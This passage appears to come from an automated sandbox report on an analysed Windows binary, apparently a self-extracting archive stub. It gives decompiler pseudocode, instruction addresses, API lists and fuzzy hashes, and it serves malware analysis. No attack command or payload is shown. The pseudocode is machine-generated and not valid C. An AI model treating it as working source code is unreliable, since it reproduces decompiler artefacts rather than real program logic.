											__ebp - 0x2c3c = E00C3FA89(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
											goto L160;
										} else {
											L158:
											__eflags = __eax;
											if(__eflags == 0) {
												L160:
												_push(1);
												__eax = __ebp - 0x2c3c;
												_push(__ebp - 0x2c3c);
												E00C39D3A(__ecx, __ebp) = __ebp - 0xbc8c;
												__ebp - 0xac8c = E00C54D7E(__ebp - 0xac8c, __ebp - 0xbc8c);
												_pop(__ecx);
												_pop(__ecx);
												__ebp - 0xac8c = E00C3B98D(__eflags, __ebp - 0xac8c);
												__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
												__eax = __ebp - 0x1c3c;
												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
												__edx = __ebp - 0x9c8c;
												__esi = __ebp - 0xac8c;
												asm("sbb ecx, ecx");
												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
												 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
												asm("sbb eax, eax");
												__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
												 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
												__eax = __ebp - 0x15c8c;
												asm("sbb edx, edx");
												__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
												E00C49D41(__ebp - 0x15c8c) = __ebp - 0x2c3c;
												__ebp - 0xbc8c = E00C49450(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
												__eflags =  *(__ebp - 0xcc8c);
												if( *(__ebp - 0xcc8c) != 0) {
													_push(__edi);
													__eax = __ebp - 0xcc8c;
													_push(__ebp - 0xcc8c);
													_push(5);
													_push(0x1000);
													__eax =  *0xc6def8();
												}
												goto L164;
											}
											goto L159;
										}
									}
								case 0xb:
									L162:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										 *0xc79600 = 1;
									}
									goto L164;
								case 0xc:
									L83:
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__eax = E00C559C0( *(__ebp - 0x5c84) & 0x0000ffff);
									__eflags = __eax - 0x46;
									if(__eax == 0x46) {
										 *0xc775d4 = 1;
									} else {
										__eflags = __eax - 0x55;
										if(__eax == 0x55) {
											 *0xc775d5 = 1;
										} else {
											__eax = 0;
											 *0xc775d4 = __al;
											 *0xc775d5 = __al;
										}
									}
									goto L164;
								case 0xd:
									L93:
									 *0xc8de21 = 1;
									__eax = __eax + 0xc8de21;
									_t104 = __esi + 0x39;
									 *_t104 =  *(__esi + 0x39) + __esp;
									__eflags =  *_t104;
									__ebp = 0xffffa37c;
									if( *_t104 != 0) {
										_t106 = __ebp - 0x5c84; // 0xffff46f8
										__eax = _t106;
										_push(_t106);
										 *0xc6d5fc = E00C413FC();
									}
									goto L164;
							}
							L2:
							_t210 = E00C49E24(_t210, _t279);
							_t279 = _t279 + 0x2000;
							_t277 = _t277 - 1;
							if(_t277 != 0) {
								goto L2;
							} else {
								_t280 = _t277;
								goto L4;
							}
						}
						L165:
						 *[fs:0x0] =  *((intOrPtr*)(_t285 - 0xc));
						return _t209;
					}
					L100:
					__eflags =  *0xc85d02;
					if( *0xc85d02 != 0) {
						goto L164;
					}
					L101:
					__eax = 0;
					 *(__ebp - 0x143c) = __ax;
					__eax = __ebp - 0x5c84;
					_push(__ebp - 0x5c84);
					__eax = E00C50BB8(__ecx);
					_pop(__ecx);
					__ecx = 0x2c;
					__eflags = __eax;
					if(__eax != 0) {
						L108:
						__eflags =  *(__ebp - 0x143c);
						if( *(__ebp - 0x143c) == 0) {
							__ebp - 0x1bc8c = __ebp - 0x5c84;
							E00C3FAB1(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
							__ebp - 0x143c = E00C3FAB1(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
						}
						__ebp - 0x5c84 = E00C49C4F(__ebp - 0x5c84);
						__eax = 0;
						 *(__ebp - 0x4c84) = __ax;
						__ebp - 0x143c = __ebp - 0x5c84;
						__eax = E00C49735( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
						__eflags = __eax - 6;
						if(__eax == 6) {
							goto L164;
						} else {
							L111:
							__eax = 0;
							__eflags = 0;
							 *0xc775d7 = 1;
							 *0xc785fa = __ax;
							__eax = EndDialog( *(__ebp + 8), 1);
							goto L112;
						}
					}
					L102:
					__esi = 0;
					__eflags =  *(__ebp - 0x5c84) - __dx;
					if( *(__ebp - 0x5c84) == __dx) {
						goto L108;
					}
					L103:
					__ecx = 0;
					__eax = __ebp - 0x5c84;
					while(1) {
						L104:
						__eflags =  *__eax - 0x40;
						if( *__eax == 0x40) {
							break;
						}
						L105:
						__esi =  &(__esi->i);
						__eax = __ebp - 0x5c84;
						__ecx = __esi + __esi;
						__eax = __ebp - 0x5c84 + __ecx;
						__eflags =  *__eax - __dx;
						if( *__eax != __dx) {
							continue;
						}
						L106:
						goto L108;
					}
					L107:
					__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
					__ebp - 0x143c = E00C3FAB1(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
					__eax = 0;
					__eflags = 0;
					 *(__ebp + __esi * 2 - 0x5c84) = __ax;
					goto L108;
					L112:
					__eflags = _t263 - 7;
					if(_t263 == 7) {
						__eflags =  *0xc795fc;
						if( *0xc795fc == 0) {
							 *0xc795fc = 2;
						}
						 *0xc785f8 = 1;
					}
					goto L164;
				}
			}










                                            0x00c4bb5b
                                            0x00c4bb5b
                                            0x00c4bb5b
                                            0x00c4bb5b
                                            0x00c4bb5e
                                            0x00000000
                                            0x00000000
                                            0x00c4bb64
                                            0x00c4bb64
                                            0x00c4bb6a
                                            0x00c4bb78
                                            0x00c4bb84
                                            0x00c4bb86
                                            0x00c4bb88
                                            0x00c4bb8d
                                            0x00c4bb8d
                                            0x00c4bb8d
                                            0x00c4bba5
                                            0x00c4bbb2
                                            0x00c4bbb7
                                            0x00c4bbb9
                                            0x00000000
                                            0x00000000
                                            0x00c4bb8b
                                            0x00c4bb8b
                                            0x00c4bb8b
                                            0x00c4bb8c
                                            0x00c4bb8c
                                            0x00c4bbbb
                                            0x00c4bbc5
                                            0x00c4bbcb
                                            0x00c4bbd3
                                            0x00c4c093
                                            0x00c4c093
                                            0x00c4c093
                                            0x00c4c098
                                            0x00c4c09c
                                            0x00c4c0a0
                                            0x00c4c0a7
                                            0x00c4c0ae
                                            0x00c4c0b1
                                            0x00c4c0b6
                                            0x00c4c0b9
                                            0x00c4c0be
                                            0x00c4b51d
                                            0x00c4b523
                                            0x00c4b529
                                            0x00c4b529
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4b53e
                                            0x00c4b555
                                            0x00c4b559
                                            0x00000000
                                            0x00c4b55b
                                            0x00000000
                                            0x00c4b55b
                                            0x00c4b559
                                            0x00c4b560
                                            0x00c4b563
                                            0x00000000
                                            0x00000000
                                            0x00c4b569
                                            0x00c4b569
                                            0x00000000
                                            0x00c4b570
                                            0x00c4b570
                                            0x00c4b573
                                            0x00000000
                                            0x00000000
                                            0x00c4b579
                                            0x00c4b579
                                            0x00c4b586
                                            0x00c4b5ac
                                            0x00c4b5b7
                                            0x00c4b5c1
                                            0x00c4b5cc
                                            0x00c4b5d1
                                            0x00c4b5d9
                                            0x00c4b5df
                                            0x00c4b5e4
                                            0x00c4b5e6
                                            0x00c4b74b
                                            0x00c4b74b
                                            0x00c4b755
                                            0x00000000
                                            0x00c4b5ec
                                            0x00c4b5f2
                                            0x00c4b614
                                            0x00c4b623
                                            0x00c4b630
                                            0x00c4b641
                                            0x00c4b644
                                            0x00c4b647
                                            0x00c4b65a
                                            0x00c4b661
                                            0x00c4b666
                                            0x00c4b668
                                            0x00000000
                                            0x00000000
                                            0x00c4b66e
                                            0x00c4b675
                                            0x00c4b67a
                                            0x00c4b67f
                                            0x00c4b68b
                                            0x00c4b690
                                            0x00c4b693
                                            0x00c4b69a
                                            0x00c4b69c
                                            0x00c4b69d
                                            0x00c4b6a7
                                            0x00c4b6ad
                                            0x00c4b6ae
                                            0x00000000
                                            0x00c4b6ae
                                            0x00c4b649
                                            0x00c4b650
                                            0x00c4b656
                                            0x00c4b658
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4b6b4
                                            0x00c4b6bb
                                            0x00c4b6bd
                                            0x00c4b6c0
                                            0x00c4b730
                                            0x00c4b730
                                            0x00c4b738
                                            0x00c4b73e
                                            0x00c4b743
                                            0x00c4b745
                                            0x00c4b5f4
                                            0x00c4b5f9
                                            0x00c4b601
                                            0x00c4b607
                                            0x00c4b60e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4b60e
                                            0x00000000
                                            0x00c4b745
                                            0x00c4b6c2
                                            0x00c4b6c9
                                            0x00c4b6cf
                                            0x00c4b6d1
                                            0x00000000
                                            0x00c4b6d3
                                            0x00c4b6d3
                                            0x00c4b6d5
                                            0x00c4b6d6
                                            0x00c4b6da
                                            0x00c4b6f2
                                            0x00c4b6f7
                                            0x00c4b701
                                            0x00c4b703
                                            0x00c4b706
                                            0x00c4b6d8
                                            0x00c4b6d8
                                            0x00c4b6d9
                                            0x00000000
                                            0x00c4b708
                                            0x00c4b716
                                            0x00c4b71c
                                            0x00c4b71e
                                            0x00c4b72a
                                            0x00c4b72a
                                            0x00000000
                                            0x00c4b71e
                                            0x00c4b706
                                            0x00c4b6d1
                                            0x00000000
                                            0x00c4b75f
                                            0x00c4b75f
                                            0x00c4b761
                                            0x00c4b767
                                            0x00c4b76c
                                            0x00c4b76e
                                            0x00c4b771
                                            0x00c4b773
                                            0x00c4b780
                                            0x00c4b785
                                            0x00c4b786
                                            0x00c4b786
                                            0x00c4b787
                                            0x00c4b787
                                            0x00c4b78a
                                            0x00c4b78c
                                            0x00c4b796
                                            0x00c4b799
                                            0x00c4b79f
                                            0x00c4b7a1
                                            0x00c4b78e
                                            0x00c4b78e
                                            0x00c4b78e
                                            0x00c4b7a6
                                            0x00c4b7a8
                                            0x00c4b7b1
                                            0x00c4b7b1
                                            0x00c4b7b3
                                            0x00c4b7b4
                                            0x00c4b7b9
                                            0x00c4b7c2
                                            0x00c4b7c3
                                            0x00c4b7c9
                                            0x00c4b7ce
                                            0x00c4b7d1
                                            0x00c4b7d3
                                            0x00c4b7d5
                                            0x00c4b7da
                                            0x00c4b7dc
                                            0x00c4b7de
                                            0x00c4b7de
                                            0x00c4b7e0
                                            0x00c4b7e0
                                            0x00c4b7e5
                                            0x00c4b7ea
                                            0x00c4b7eb
                                            0x00c4b7eb
                                            0x00c4b7ec
                                            0x00c4b7ee
                                            0x00c4b7f5
                                            0x00c4b7fa
                                            0x00c4b7ee
                                            0x00000000
                                            0x00000000
                                            0x00c4b800
                                            0x00c4b800
                                            0x00c4b802
                                            0x00c4b812
                                            0x00c4b812
                                            0x00000000
                                            0x00000000
                                            0x00c4b81d
                                            0x00c4b81d
                                            0x00c4b81f
                                            0x00000000
                                            0x00000000
                                            0x00c4b825
                                            0x00c4b825
                                            0x00c4b82c
                                            0x00000000
                                            0x00000000
                                            0x00c4b832
                                            0x00c4b832
                                            0x00c4b834
                                            0x00c4b83a
                                            0x00c4b83c
                                            0x00c4b843
                                            0x00c4b844
                                            0x00c4b84b
                                            0x00c4b84d
                                            0x00c4b84d
                                            0x00c4b854
                                            0x00c4b859
                                            0x00c4b85f
                                            0x00c4b861
                                            0x00000000
                                            0x00c4b867
                                            0x00c4b867
                                            0x00c4b867
                                            0x00c4b86a
                                            0x00c4b86c
                                            0x00c4b86d
                                            0x00c4b870
                                            0x00c4b899
                                            0x00c4b899
                                            0x00c4b89c
                                            0x00c4b981
                                            0x00c4b98a
                                            0x00c4b98f
                                            0x00c4b98f
                                            0x00c4b991
                                            0x00c4b991
                                            0x00c4b993
                                            0x00c4b995
                                            0x00c4b99c
                                            0x00c4b9a1
                                            0x00c4b9a2
                                            0x00c4b9a3
                                            0x00c4b9a5
                                            0x00c4b9a7
                                            0x00c4b9ab
                                            0x00c4b9ad
                                            0x00c4b9ad
                                            0x00c4b9af
                                            0x00c4b9af
                                            0x00c4b9ab
                                            0x00c4b9b3
                                            0x00c4b9b9
                                            0x00c4b9c6
                                            0x00c4b9cd
                                            0x00c4b9dd
                                            0x00c4b9e7
                                            0x00c4b9ef
                                            0x00c4b9fb
                                            0x00c4b9fd
                                            0x00c4ba05
                                            0x00c4ba0a
                                            0x00c4ba0b
                                            0x00c4ba0c
                                            0x00c4ba0e
                                            0x00c4ba1b
                                            0x00c4ba24
                                            0x00c4ba24
                                            0x00000000
                                            0x00c4ba0e
                                            0x00c4b8a2
                                            0x00c4b8a2
                                            0x00c4b8a5
                                            0x00c4b8b2
                                            0x00c4b8b2
                                            0x00c4b8b5
                                            0x00c4b8b7
                                            0x00c4b8b8
                                            0x00c4b8ba
                                            0x00c4b8bb
                                            0x00c4b8c0
                                            0x00c4b8c5
                                            0x00c4b8cb
                                            0x00c4b8cd
                                            0x00c4b8cf
                                            0x00c4b8d2
                                            0x00c4b8d9
                                            0x00c4b8da
                                            0x00c4b8e0
                                            0x00c4b8e1
                                            0x00c4b8e4
                                            0x00c4b8e5
                                            0x00c4b8e6
                                            0x00c4b8eb
                                            0x00c4b8ee
                                            0x00c4b8f4
                                            0x00c4b8fd
                                            0x00c4b900
                                            0x00c4b905
                                            0x00c4b907
                                            0x00c4b909
                                            0x00c4b90b
                                            0x00c4b90b
                                            0x00c4b90d
                                            0x00c4b90d
                                            0x00c4b90f
                                            0x00c4b90f
                                            0x00c4b917
                                            0x00c4b91e
                                            0x00c4b920
                                            0x00c4b927
                                            0x00c4b92d
                                            0x00c4b92f
                                            0x00c4b930
                                            0x00c4b938
                                            0x00c4b947
                                            0x00c4b947
                                            0x00c4b938
                                            0x00c4b952
                                            0x00c4b954
                                            0x00c4b963
                                            0x00c4b969
                                            0x00c4b96f
                                            0x00c4b97a
                                            0x00c4b97a
                                            0x00000000
                                            0x00c4b96f
                                            0x00c4b8a7
                                            0x00c4b8a7
                                            0x00c4b8ac
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4b8ac
                                            0x00c4b872
                                            0x00c4b872
                                            0x00c4b876
                                            0x00000000
                                            0x00000000
                                            0x00c4b878
                                            0x00c4b878
                                            0x00c4b87b
                                            0x00c4b87d
                                            0x00c4b880
                                            0x00000000
                                            0x00000000
                                            0x00c4b886
                                            0x00c4b88f
                                            0x00000000
                                            0x00c4b88f
                                            0x00000000
                                            0x00c4ba2b
                                            0x00c4ba2b
                                            0x00c4ba2c
                                            0x00c4ba31
                                            0x00c4ba33
                                            0x00c4ba36
                                            0x00c4ba36
                                            0x00000000
                                            0x00c4ba6c
                                            0x00c4ba6c
                                            0x00c4ba73
                                            0x00c4ba75
                                            0x00c4ba75
                                            0x00c4ba77
                                            0x00c4baa6
                                            0x00c4baa6
                                            0x00c4baac
                                            0x00000000
                                            0x00c4baac
                                            0x00c4ba79
                                            0x00c4ba79
                                            0x00c4ba79
                                            0x00c4ba7c
                                            0x00c4ba95
                                            0x00c4ba95
                                            0x00c4ba9b
                                            0x00c4ba9b
                                            0x00000000
                                            0x00c4ba9b
                                            0x00c4ba7e
                                            0x00c4ba7e
                                            0x00c4ba7e
                                            0x00c4ba81
                                            0x00000000
                                            0x00000000
                                            0x00c4ba83
                                            0x00c4ba83
                                            0x00c4ba83
                                            0x00c4ba86
                                            0x00000000
                                            0x00000000
                                            0x00c4ba8c
                                            0x00c4ba8c
                                            0x00000000
                                            0x00000000
                                            0x00c4baf9
                                            0x00c4baf9
                                            0x00c4bafc
                                            0x00000000
                                            0x00000000
                                            0x00c4bafe
                                            0x00c4bafe
                                            0x00c4bb0a
                                            0x00c4bb0f
                                            0x00c4bb10
                                            0x00c4bb11
                                            0x00c4bb13
                                            0x00000000
                                            0x00000000
                                            0x00c4bb15
                                            0x00c4bb15
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4bd07
                                            0x00c4bd07
                                            0x00c4bd0a
                                            0x00c4bd0c
                                            0x00c4bd13
                                            0x00c4bd15
                                            0x00c4bd1b
                                            0x00c4bd1c
                                            0x00c4bd21
                                            0x00c4bd22
                                            0x00c4bd22
                                            0x00c4bd27
                                            0x00c4bd2a
                                            0x00c4bd30
                                            0x00c4bd30
                                            0x00c4bd35
                                            0x00000000
                                            0x00000000
                                            0x00c4bd41
                                            0x00c4bd41
                                            0x00c4bd44
                                            0x00c4bb25
                                            0x00c4bb25
                                            0x00000000
                                            0x00c4bb25
                                            0x00c4bd4a
                                            0x00c4bd4a
                                            0x00c4bb16
                                            0x00c4bb16
                                            0x00c4bb1c
                                            0x00c4bb1d
                                            0x00c4bb20
                                            0x00000000
                                            0x00000000
                                            0x00c4bd51
                                            0x00c4bd51
                                            0x00c4bd54
                                            0x00000000
                                            0x00000000
                                            0x00c4bd5a
                                            0x00c4bd5a
                                            0x00c4bd5c
                                            0x00c4bd63
                                            0x00c4bd6b
                                            0x00c4bd71
                                            0x00c4bd76
                                            0x00c4bd79
                                            0x00c4bdae
                                            0x00c4bdb3
                                            0x00c4bdb9
                                            0x00c4bdba
                                            0x00c4bdbf
                                            0x00c4bd7b
                                            0x00c4bd7b
                                            0x00c4bd7e
                                            0x00c4bd84
                                            0x00c4bd9a
                                            0x00c4bd9f
                                            0x00c4bda0
                                            0x00c4bda5
                                            0x00c4bd86
                                            0x00c4bd86
                                            0x00c4bd8b
                                            0x00c4bd8c
                                            0x00c4bd91
                                            0x00c4bd91
                                            0x00c4bd84
                                            0x00c4bdc6
                                            0x00c4bdc8
                                            0x00c4bdcf
                                            0x00c4bddd
                                            0x00c4bde4
                                            0x00c4bde9
                                            0x00c4bdea
                                            0x00c4bdeb
                                            0x00c4bded
                                            0x00c4bdee
                                            0x00c4bdf5
                                            0x00c4be3e
                                            0x00c4be45
                                            0x00c4be4a
                                            0x00c4be4c
                                            0x00000000
                                            0x00000000
                                            0x00c4be52
                                            0x00c4be52
                                            0x00c4be54
                                            0x00c4be5a
                                            0x00c4be61
                                            0x00000000
                                            0x00000000
                                            0x00c4be63
                                            0x00c4be63
                                            0x00c4be65
                                            0x00c4be66
                                            0x00c4be66
                                            0x00c4be66
                                            0x00c4be69
                                            0x00c4be6c
                                            0x00c4be76
                                            0x00c4be76
                                            0x00c4be78
                                            0x00c4be7a
                                            0x00c4be84
                                            0x00c4be89
                                            0x00c4be8b
                                            0x00c4bec9
                                            0x00c4bec9
                                            0x00c4becc
                                            0x00c4becc
                                            0x00c4bece
                                            0x00c4becf
                                            0x00c4becf
                                            0x00000000
                                            0x00c4becf
                                            0x00c4be8d
                                            0x00c4be8d
                                            0x00c4be8f
                                            0x00c4be90
                                            0x00c4be92
                                            0x00c4be95
                                            0x00c4beaa
                                            0x00c4beaa
                                            0x00c4beac
                                            0x00c4bead
                                            0x00c4bead
                                            0x00c4bead
                                            0x00c4beb0
                                            0x00c4beb0
                                            0x00c4beb5
                                            0x00c4beb6
                                            0x00c4bebc
                                            0x00c4bebc
                                            0x00c4bebd
                                            0x00c4bec2
                                            0x00c4bec3
                                            0x00c4bec4
                                            0x00000000
                                            0x00c4bec4
                                            0x00c4be97
                                            0x00c4be97
                                            0x00c4be9e
                                            0x00c4bea1
                                            0x00c4bea2
                                            0x00000000
                                            0x00c4bea2
                                            0x00c4be6e
                                            0x00c4be6e
                                            0x00c4be70
                                            0x00c4be71
                                            0x00c4be74
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4bed1
                                            0x00c4bed1
                                            0x00c4bed4
                                            0x00c4bed4
                                            0x00c4bed9
                                            0x00c4bedb
                                            0x00c4bedd
                                            0x00c4bedd
                                            0x00c4bedf
                                            0x00c4bedf
                                            0x00000000
                                            0x00c4bdf7
                                            0x00c4bdf7
                                            0x00c4bdfe
                                            0x00c4be0a
                                            0x00c4be10
                                            0x00c4be11
                                            0x00c4be12
                                            0x00c4be17
                                            0x00c4be1a
                                            0x00c4be1c
                                            0x00c4be22
                                            0x00c4be24
                                            0x00c4be32
                                            0x00c4be37
                                            0x00c4be38
                                            0x00c4be38
                                            0x00c4bee2
                                            0x00c4bee2
                                            0x00c4beea
                                            0x00c4beef
                                            0x00c4bef1
                                            0x00c4bef2
                                            0x00c4bef8
                                            0x00c4bef9
                                            0x00c4beff
                                            0x00c4bf00
                                            0x00c4bf00
                                            0x00c4bf05
                                            0x00c4bf06
                                            0x00c4bf0c
                                            0x00c4bf0d
                                            0x00c4bf13
                                            0x00c4bf14
                                            0x00c4bf19
                                            0x00c4bf21
                                            0x00c4bf2d
                                            0x00c4bf2d
                                            0x00c4bf3a
                                            0x00c4bf3f
                                            0x00c4bf47
                                            0x00c4bf51
                                            0x00c4bf5e
                                            0x00c4bf65
                                            0x00c4bf65
                                            0x00c4bf71
                                            0x00c4bf78
                                            0x00c4bf7d
                                            0x00c4bf85
                                            0x00c4bf8b
                                            0x00c4bf8c
                                            0x00c4bf8d
                                            0x00c4bf8f
                                            0x00c4bf8f
                                            0x00c4bfa4
                                            0x00c4bfa9
                                            0x00c4bfb5
                                            0x00c4bfb7
                                            0x00c4bfc8
                                            0x00c4bfd5
                                            0x00000000
                                            0x00c4bfb9
                                            0x00c4bfb9
                                            0x00c4bfc4
                                            0x00c4bfc6
                                            0x00c4bfda
                                            0x00c4bfda
                                            0x00c4bfdc
                                            0x00c4bfe2
                                            0x00c4bfe8
                                            0x00c4bff6
                                            0x00c4bffb
                                            0x00c4bffc
                                            0x00c4c004
                                            0x00c4c009
                                            0x00c4c010
                                            0x00c4c016
                                            0x00c4c018
                                            0x00c4c01e
                                            0x00c4c024
                                            0x00c4c026
                                            0x00c4c02f
                                            0x00c4c032
                                            0x00c4c034
                                            0x00c4c03d
                                            0x00c4c040
                                            0x00c4c046
                                            0x00c4c049
                                            0x00c4c052
                                            0x00c4c061
                                            0x00c4c066
                                            0x00c4c06e
                                            0x00c4c070
                                            0x00c4c071
                                            0x00c4c077
                                            0x00c4c078
                                            0x00c4c07a
                                            0x00c4c07f
                                            0x00c4c07f
                                            0x00000000
                                            0x00c4c06e
                                            0x00000000
                                            0x00c4bfc6
                                            0x00c4bfb7
                                            0x00000000
                                            0x00c4c087
                                            0x00c4c087
                                            0x00c4c08a
                                            0x00c4c08c
                                            0x00c4c08c
                                            0x00000000
                                            0x00000000
                                            0x00c4bab8
                                            0x00c4bab8
                                            0x00c4bac0
                                            0x00c4bac6
                                            0x00c4bac9
                                            0x00c4baed
                                            0x00c4bacb
                                            0x00c4bacb
                                            0x00c4bace
                                            0x00c4bae1
                                            0x00c4bad0
                                            0x00c4bad0
                                            0x00c4bad2
                                            0x00c4bad7
                                            0x00c4bad7
                                            0x00c4bace
                                            0x00000000
                                            0x00000000
                                            0x00c4bb31
                                            0x00c4bb31
                                            0x00c4bb32
                                            0x00c4bb37
                                            0x00c4bb37
                                            0x00c4bb37
                                            0x00c4bb3a
                                            0x00c4bb3f
                                            0x00c4bb45
                                            0x00c4bb45
                                            0x00c4bb4b
                                            0x00c4bb51
                                            0x00c4bb51
                                            0x00000000
                                            0x00000000
                                            0x00c4b52a
                                            0x00c4b52c
                                            0x00c4b531
                                            0x00c4b537
                                            0x00c4b53a
                                            0x00000000
                                            0x00c4b53c
                                            0x00c4b53c
                                            0x00000000
                                            0x00c4b53c
                                            0x00c4b53a
                                            0x00c4c0c4
                                            0x00c4c0ca
                                            0x00c4c0d4
                                            0x00c4c0d4
                                            0x00c4bbd9
                                            0x00c4bbd9
                                            0x00c4bbe0
                                            0x00000000
                                            0x00000000
                                            0x00c4bbe6
                                            0x00c4bbe6
                                            0x00c4bbe8
                                            0x00c4bbef
                                            0x00c4bbf7
                                            0x00c4bbf8
                                            0x00c4bbfd
                                            0x00c4bbfe
                                            0x00c4bbff
                                            0x00c4bc01
                                            0x00c4bc55
                                            0x00c4bc55
                                            0x00c4bc5d
                                            0x00c4bc6b
                                            0x00c4bc7c
                                            0x00c4bc8a
                                            0x00c4bc8a
                                            0x00c4bc96
                                            0x00c4bc9b
                                            0x00c4bc9d
                                            0x00c4bcad
                                            0x00c4bcb7
                                            0x00c4bcbc
                                            0x00c4bcbf
                                            0x00000000
                                            0x00c4bcc5
                                            0x00c4bcc5
                                            0x00c4bcca
                                            0x00c4bcca
                                            0x00c4bccc
                                            0x00c4bcd3
                                            0x00c4bcd9
                                            0x00000000
                                            0x00c4bcd9
                                            0x00c4bcbf
                                            0x00c4bc03
                                            0x00c4bc05
                                            0x00c4bc07
                                            0x00c4bc0e
                                            0x00000000
                                            0x00000000
                                            0x00c4bc10
                                            0x00c4bc10
                                            0x00c4bc12
                                            0x00c4bc18
                                            0x00c4bc18
                                            0x00c4bc18
                                            0x00c4bc1c
                                            0x00000000
                                            0x00000000
                                            0x00c4bc1e
                                            0x00c4bc1e
                                            0x00c4bc1f
                                            0x00c4bc25
                                            0x00c4bc28
                                            0x00c4bc2a
                                            0x00c4bc2d
                                            0x00000000
                                            0x00000000
                                            0x00c4bc2f
                                            0x00000000
                                            0x00c4bc2f
                                            0x00c4bc31
                                            0x00c4bc3c
                                            0x00c4bc46
                                            0x00c4bc4b
                                            0x00c4bc4b
                                            0x00c4bc4d
                                            0x00000000
                                            0x00c4bcdf
                                            0x00c4bcdf
                                            0x00c4bce2
                                            0x00c4bce8
                                            0x00c4bcef
                                            0x00c4bcf1
                                            0x00c4bcf1
                                            0x00c4bcfb
                                            0x00c4bcfb
                                            0x00000000
                                            0x00c4bce2

                                            APIs
                                            • GetTempPathW.KERNEL32(00000800,?), ref: 00C4BB71
                                            • _swprintf.LIBCMT ref: 00C4BBA5
                                              • Part of subcall function 00C33E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C33E54
                                            • SetDlgItemTextW.USER32(?,00000066,00C785FA), ref: 00C4BBC5
                                            • _wcschr.LIBVCRUNTIME ref: 00C4BBF8
                                            • EndDialog.USER32(?,00000001), ref: 00C4BCD9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                            • String ID: %s%s%u
                                            • API String ID: 2892007947-1360425832
                                            • Opcode ID: dfc9769711a706abd3811726f375ac91228401440b7bf9d502b806e07913b2e7
                                            • Instruction ID: 5ad7acf384ffd6128680ded7c925794fa687818267af40ce963cbea2a97a256f
                                            • Opcode Fuzzy Hash: dfc9769711a706abd3811726f375ac91228401440b7bf9d502b806e07913b2e7
                                            • Instruction Fuzzy Hash: 3F413972940219AEEF65DB61CDC5FEE77B8EB04314F0040A6E51AE6061EF709B889F51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C488BF, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 124memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E00C488BF(void* __edx) {
				void* __ecx;
				void* _t20;
				short* _t24;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr* _t38;
				void* _t44;
				void* _t58;
				intOrPtr* _t60;
				short* _t62;
				short* _t64;
				intOrPtr* _t67;
				long _t69;
				void* _t71;
				void* _t72;

				_t58 = __edx;
				_t43 = _t44;
				if( *((intOrPtr*)(_t44 + 0x10)) == 0) {
					return _t20;
				}
				 *(_t71 + 4) =  *(_t71 + 4) & 0x00000000;
				_t60 =  *((intOrPtr*)(_t71 + 0x18));
				 *((char*)(_t71 + 0x1c)) = E00C487A5(_t60);
				_push(0x200 + E00C52B33(_t60) * 2);
				_t24 = E00C52B53(_t44);
				_t64 = _t24;
				if(_t64 == 0) {
					L16:
					return _t24;
				}
				E00C54D7E(_t64, L"<html>");
				E00C566ED(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E00C566ED(_t64, L"utf-8\"></head>");
				_t72 = _t71 + 0x18;
				_t67 = _t60;
				_t28 = 0x20;
				if( *_t60 != _t28) {
					L4:
					_t29 = E00C41432(_t76, _t67, L"<html>", 6);
					asm("sbb al, al");
					_t31 =  ~_t29 + 1;
					 *((intOrPtr*)(_t72 + 0x14)) = _t31;
					if(_t31 != 0) {
						_t60 = _t67 + 0xc;
					}
					E00C566ED(_t64, _t60);
					if( *((char*)(_t72 + 0x1c)) == 0) {
						E00C566ED(_t64, L"</html>");
					}
					_t79 =  *((char*)(_t72 + 0x1c));
					if( *((char*)(_t72 + 0x1c)) == 0) {
						_push(_t64);
						_t64 = E00C48ACA(_t58, _t79);
					}
					_t69 = 9 + E00C52B33(_t64) * 6;
					_t62 = GlobalAlloc(0x40, _t69);
					if(_t62 != 0) {
